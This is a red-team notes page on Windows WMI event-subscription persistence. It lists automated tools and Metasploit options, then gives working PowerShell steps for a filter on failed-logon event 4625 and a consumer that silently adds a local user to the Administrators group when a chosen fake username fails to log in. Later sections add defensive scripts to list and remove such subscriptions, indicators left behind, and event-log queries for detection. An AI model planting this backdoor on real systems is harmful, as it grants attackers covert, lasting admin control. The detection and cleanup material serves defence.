
# WMI Persist With Event Filters

### Automation

* There are many great automated ways to do this.
* <https://github.com/Sw4mpf0x/PowerLurk>
* Metasploit post module `exploit/windows/local/wmi_persistence`

```
Basic options:
  Name                Current Setting  Required  Description
  ----                ---------------  --------  -----------
  CALLBACK_INTERVAL   1800000          yes       Time between callbacks (In milliseconds). (Default: 1800000).
  CLASSNAME           UPDATER          yes       WMI event class name. (Default: UPDATER)
  EVENT_ID_TRIGGER    4625             yes       Event ID to trigger the payload. (Default: 4625)
  PERSISTENCE_METHOD  EVENT            yes       Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
  PROCESS_TRIGGER     CALC.EXE         yes       The process name to trigger the payload. (Default: CALC.EXE)
  SESSION                              yes       The session to run this module on.
  USERNAME_TRIGGER    BOB              yes       The username to trigger the payload. (Default: BOB)
  WAITFOR_TRIGGER     CALL             yes       The word to trigger the payload. (Default: CALL)

```

### Manual Mode

* Check whether WMI is enabled; if it is not, any `WMI` command you execute will attempt to download `WMI`
* That download process is logged in the `WMI Log`
* Check if WMI is enabled on the remote system

```
reg query "HKLM\System\CurrentControlSet\Services\Winmgmt"
Start        REG_DWORD        0x2

0x2 --> Auto Start
0x3 --> Demand Start
0x4 --> Disabled

#OR
get-service Winmgmt
```


#### Check for existing entries

* Check for existing event filter consumer bindings that are on the system

```
Get-Wmiobject -Class __FilterToConsumerBinding -NameSpace "root\Subscription"
```
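The page's one-liner lists only the bindings. The following added example (not from the original page) resolves each binding back to its filter query and consumer action, which is what a reviewer actually needs to judge whether a subscription is legitimate. It assumes the `root\subscription` namespace and the standard consumer classes; `Get-WmiSubscriptionReport` is a name chosen here.

```powershell
# Added example: enumerate permanent WMI subscriptions and show, per binding,
# the WQL trigger and the command/script the consumer would run.
function Get-WmiSubscriptionReport {
    param(
        [string]$ComputerName = '.',
        [string]$Namespace    = 'root\subscription'
    )

    $filters   = Get-WmiObject -Namespace $Namespace -Class __EventFilter   -ComputerName $ComputerName
    $consumers = Get-WmiObject -Namespace $Namespace -Class __EventConsumer -ComputerName $ComputerName
    $bindings  = Get-WmiObject -Namespace $Namespace -Class __FilterToConsumerBinding -ComputerName $ComputerName

    foreach ($b in $bindings) {
        # Binding.Filter / Binding.Consumer are relative object paths such as
        # __EventFilter.Name="..." so match them against each instance's __RELPATH.
        $f = $filters   | Where-Object { $_.__RELPATH -eq $b.Filter }
        $c = $consumers | Where-Object { $_.__RELPATH -eq $b.Consumer }

        # Each consumer type stores its "action" in a differently named property.
        $action = switch ($c.__CLASS) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { $c.ScriptText }
            'LogFileEventConsumer'      { $c.Filename }
            default                     { '<no command property>' }
        }

        [PSCustomObject]@{
            FilterName   = $f.Name
            Query        = $f.Query
            ConsumerName = $c.Name
            ConsumerType = $c.__CLASS
            Action       = $action
            Filter       = $b.Filter
            Consumer     = $b.Consumer
        }
    }
}

# A binding whose filter watches the Security log and whose consumer launches
# powershell.exe (as in the walkthrough below) stands out immediately here.
Get-WmiSubscriptionReport | Format-List
```

A binding whose filter or consumer no longer exists shows empty `FilterName`/`ConsumerName` fields, which is itself worth a closer look.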

#### Ensure the system is logging event logs for the type of event you want to use

* i.e. logon and logoff events

```
auditpol /get /category:*
#OR for logon logoff 
auditpol /get /category:Logon/Logoff

--output--
System audit policy
Category/Subcategory                      Setting
Logon/Logoff
  Logon                                   Success and Failure
  Logoff                                  Success
  Account Lockout                         Success
  IPsec Main Mode                         No Auditing
  IPsec Quick Mode                        No Auditing
  IPsec Extended Mode                     No Auditing
  Special Logon                           Success
  Other Logon/Logoff Events               No Auditing
  Network Policy Server                   Success and Failure
  User / Device Claims                    No Auditing
  Group Membership                        No Auditing
```

#### Create your own filter and consumer

```
$x='SCM System Log Filter'
$z='SCM System Log Consumer'
```

#### Now create the triggering event

```
$q="Select * from __InstanceCreationEvent WITHIN 10 where TargetInstance isa 'Win32_NTLogEvent' and TargetInstance.LogFile='Security' and (TargetInstance.EventCode='4625')"
```

#### Now create your event filter

```
$wmifilter=Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$x;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$q} -ErrorAction Stop
```

#### Create the event consumer

```
$wmiconsumer=Set-WmiInstance -Class CommandLineEventConsumer -NameSpace "root\subscription" -Arguments @{Name=$z;CommandLineTemplate='C:\\Windows\\System32\\windowspowershell\\v1.0\\powershell.exe -v 2.0 -nop -c "if(wevtutil qe security /rd:true /f:text /c:1 `"*[System/EventID=4625]`" | findstr /i "fake username here"){net localgroup Administrators <localuser> /add}"'}
```

#### Combine the filter and the consumer

```
Set-WmiInstance -Class __FilterToConsumerBinding -NameSpace "root\subscription" -Arguments @{Filter=$wmifilter;Consumer=$wmiconsumer}
```

#### Ensure it's all working and correct

```
Get-WmiObject -Class __FilterToConsumerBinding -NameSpace "root\subscription"
```
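Once the walkthrough above has been tested, or when a subscription like it is found during incident response, it has to come out in the right order: the binding first, then the filter and the consumer. This added example (not from the original page) does that for the names the walkthrough assigns to `$x` and `$z`; `Remove-WmiSubscription` is a name chosen here.

```powershell
# Added example: tear down a permanent WMI subscription by filter/consumer name.
function Remove-WmiSubscription {
    param(
        [Parameter(Mandatory)][string]$FilterName,
        [Parameter(Mandatory)][string]$ConsumerName,
        [string]$Namespace = 'root\subscription'
    )

    # Bindings hold relative paths like __EventFilter.Name="X" and
    # CommandLineEventConsumer.Name="Y"; match on the Name part only so any
    # consumer class is caught.
    $filterPath   = '__EventFilter.Name="{0}"' -f $FilterName
    $consumerLike = '*.Name="{0}"' -f $ConsumerName

    Get-WmiObject -Namespace $Namespace -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -eq $filterPath -or $_.Consumer -like $consumerLike } |
        ForEach-Object {
            Write-Host "Removing binding: $($_.__RELPATH)"
            $_ | Remove-WmiObject
        }

    # With the binding gone the filter and consumer are inert; remove them too
    # so nothing is left to re-bind later.
    Get-WmiObject -Namespace $Namespace -Class __EventFilter -Filter "Name='$FilterName'" |
        Remove-WmiObject
    Get-WmiObject -Namespace $Namespace -Class __EventConsumer |
        Where-Object { $_.Name -eq $ConsumerName } |
        Remove-WmiObject
}

Remove-WmiSubscription -FilterName 'SCM System Log Filter' -ConsumerName 'SCM System Log Consumer'

# Verify: neither name should appear in the remaining bindings.
Get-WmiObject -Namespace 'root\subscription' -Class __FilterToConsumerBinding |
    Select-Object Filter, Consumer
```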

### IOCs Left Behind

```
C:\Windows\System32\Wbem\Repository\INDEX.BTR
- Contains the names of the event filter and event consumer
C:\Windows\System32\Wbem\Repository\OBJECTS.DATA
- Contains the names of the event filter and event consumer
- Contains the command in the event consumer 
C:\Windows\System32\Wbem\Repository\MAPPING2.MAP
- Prefetch Files
"HKLM\Software\Microsoft\Wbem\Ess\//./root\CIMV2\MS_NT_EVENT_LOG_EVENT_PROVIDER"
```

#### Other Logs

```
5857 Active ScriptEventConsumer provider started with result code 0x0
```
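Event 5857 above is one of a small family (5857 to 5861) written to the `Microsoft-Windows-WMI-Activity/Operational` log; 5861 is the one that records a new permanent filter-to-consumer binding, including the query and consumer definition. This added example (not from the original page) pulls those events for review; it assumes the log is enabled on the host, and `Get-WmiSubscriptionEvents` is a name chosen here.

```powershell
# Added example: collect WMI-Activity events tied to subscription activity and
# flag the ones that reference the subscription namespace or a consumer class.
function Get-WmiSubscriptionEvents {
    param([int]$Days = 7)

    $filter = @{
        LogName   = 'Microsoft-Windows-WMI-Activity/Operational'
        Id        = 5857, 5858, 5859, 5860, 5861
        StartTime = (Get-Date).AddDays(-$Days)
    }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            [PSCustomObject]@{
                Time    = $_.TimeCreated
                Id      = $_.Id
                # 5861 carries the full filter query and consumer definition;
                # 5859/5860 carry the query text for permanent/temporary subscriptions.
                Suspect = ($_.Message -match 'root[\\/]+subscription|CommandLineEventConsumer|ActiveScriptEventConsumer')
                Message = $_.Message
            }
        }
}

# Start with the binding events, then widen to the rest if something turns up.
Get-WmiSubscriptionEvents -Days 30 |
    Where-Object { $_.Id -eq 5861 -or $_.Suspect } |
    Sort-Object Time |
    Format-List Time, Id, Message
```

5857 fires whenever a provider loads and is noisy on its own; 5861 with a `CommandLineEventConsumer` in the message is the signal to act on.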
